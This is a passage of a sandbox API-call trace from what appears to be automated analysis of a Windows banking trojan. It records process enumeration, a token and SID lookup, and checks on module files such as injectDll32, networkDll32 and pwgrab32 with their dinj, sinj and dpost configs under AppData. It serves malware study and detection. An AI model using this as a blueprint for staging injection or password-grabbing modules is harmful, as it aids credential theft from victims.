	[0219.723] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0219.723] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0219.723] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0219.724] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0219.724] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0219.725] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0219.725] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0219.726] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0219.726] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0219.817] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0219.817] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0219.818] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0219.818] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0219.819] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0219.819] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0219.820] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0219.820] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0219.821] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0219.821] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.822] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.822] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.823] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.823] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.824] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.824] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0219.825] lstrcmpW (lpString1="explorer.exe", lpString2="dllhost.exe") returned 1
	[0219.825] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.826] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0219.826] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0219.827] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0219.828] Process32NextW (in: hSnapshot=0x56c, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0219.829] CloseHandle (hObject=0x56c) returned 1
	[0219.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0d0
	[0219.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d358
	[0219.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0219.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x56c
	[0219.829] OpenProcessToken (in: ProcessHandle=0x56c, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x5d4) returned 1
	[0219.829] GetTokenInformation (in: TokenHandle=0x5d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0219.829] GetLastError () returned 0x7a
	[0219.829] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5ab8
	[0219.829] GetTokenInformation (in: TokenHandle=0x5d4, TokenInformationClass=0x1, TokenInformation=0x22a5ab8, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a5ab8, ReturnLength=0x128c98) returned 1
	[0219.829] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5ac0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0219.830] CloseHandle (hObject=0x5d4) returned 1
	[0219.831] CloseHandle (hObject=0x56c) returned 1
	[0219.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e48
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d0d0) returned 1
	[0219.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0219.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0d0
	[0219.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311318
	[0219.831] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0219.831] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0219.831] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311318) returned 1
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d0d0) returned 1
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d358) returned 1
	[0219.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0219.831] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0219.831] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0219.831] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0219.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0219.831] Sleep (dwMilliseconds=0x4e20) 
	[0219.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.837] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0219.837] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.837] GetFileTime (in: hFile=0x56c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.837] CloseHandle (hObject=0x56c) returned 1
	[0219.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.837] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.837] GetFileTime (in: hFile=0x56c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.837] CloseHandle (hObject=0x56c) returned 1
	[0219.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.838] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.838] GetFileTime (in: hFile=0x56c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.838] CloseHandle (hObject=0x56c) returned 1
	[0219.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.838] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0219.838] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.838] GetFileTime (in: hFile=0x56c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.838] CloseHandle (hObject=0x56c) returned 1
	[0219.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.838] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0219.838] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.838] GetFileTime (in: hFile=0x56c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.838] CloseHandle (hObject=0x56c) returned 1
	[0219.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.839] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0219.839] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0219.839] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6980
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0219.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d358
	[0219.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26acf08
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0219.839] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x24d358, Size=0x10) returned 0x24d0d0
	[0219.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad120
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0219.839] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x24d0d0, Size=0x10) returned 0x24d358
	[0219.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad338
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0219.839] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x24d358, Size=0x10) returned 0x24d0d0
	[0219.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad550
	[0219.839] FindNextFileW (in: hFindFile=0x22b6980, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0219.839] GetLastError () returned 0x12
	[0219.839] FindClose (in: hFindFile=0x22b6980 | out: hFindFile=0x22b6980) returned 1
	[0219.840] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0219.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad768
	[0219.840] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26ad768, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0219.840] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.840] GetFileTime (in: hFile=0x56c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.840] CloseHandle (hObject=0x56c) returned 1
	[0219.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad768) returned 1
	[0219.840] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0219.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad768
	[0219.840] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26ad768, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0219.840] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.840] GetFileTime (in: hFile=0x56c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.840] CloseHandle (hObject=0x56c) returned 1
	[0219.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
